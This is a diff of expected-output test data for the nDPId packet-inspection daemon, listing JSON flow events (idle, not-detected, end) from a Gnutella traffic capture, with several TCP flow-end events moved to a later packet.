00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72851,"flow_last_seen":72851,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.225.140.186","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71538,"flow_last_seen":71538,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.39.154.69","src_port":28681,"dst_port":4832,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1796,8 +1796,6 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82065,"flow_last_seen":82065,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"120.156.204.38","src_port":28681,"dst_port":54832,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82064,"flow_last_seen":82064,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.73.129.26","src_port":28681,"dst_port":53585,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82064,"flow_last_seen":82064,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.73.129.26","src_port":28681,"dst_port":53585,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":50193,"dst_port":46010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00555{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":50193,"dst_port":46010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82066,"flow_last_seen":82066,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.242.191.215","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82066,"flow_last_seen":82066,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.242.191.215","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82066,"flow_last_seen":82066,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.249.64.215","src_port":28681,"dst_port":25058,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1808,22 +1806,16 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82064,"flow_last_seen":82064,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"208.92.106.151","src_port":28681,"dst_port":32476,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82059,"flow_last_seen":82059,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.157.59.43","src_port":28681,"dst_port":56919,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82059,"flow_last_seen":82059,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.157.59.43","src_port":28681,"dst_port":56919,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":50190,"dst_port":29545,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":50190,"dst_port":29545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":83519,"flow_last_seen":83519,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.159.27.22","src_port":28681,"dst_port":17563,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":83519,"flow_last_seen":83519,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.159.27.22","src_port":28681,"dst_port":17563,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82063,"flow_last_seen":82063,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.195.105.243","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82063,"flow_last_seen":82063,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.195.105.243","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":50192,"dst_port":16201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00555{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":50192,"dst_port":16201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82061,"flow_last_seen":82061,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"178.51.146.115","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82061,"flow_last_seen":82061,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"178.51.146.115","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82062,"flow_last_seen":82062,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.182.44.202","src_port":28681,"dst_port":30277,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82062,"flow_last_seen":82062,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.182.44.202","src_port":28681,"dst_port":30277,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82060,"flow_last_seen":82060,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"196.74.159.56","src_port":28681,"dst_port":29271,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82060,"flow_last_seen":82060,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"196.74.159.56","src_port":28681,"dst_port":29271,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":50191,"dst_port":6778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":50191,"dst_port":6778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82065,"flow_last_seen":82065,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.29.197.138","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82065,"flow_last_seen":82065,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.29.197.138","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":83517,"flow_last_seen":83517,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.100.120.146","src_port":28681,"dst_port":12838,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1901,10 +1893,18 @@ 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":93713,"flow_last_seen":93713,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.168.175.31","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":50193,"dst_port":46010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00555{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":50193,"dst_port":46010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":50190,"dst_port":29545,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":50190,"dst_port":29545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":50192,"dst_port":16201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00555{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":50192,"dst_port":16201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":50191,"dst_port":6778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":50191,"dst_port":6778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00569{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174528,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 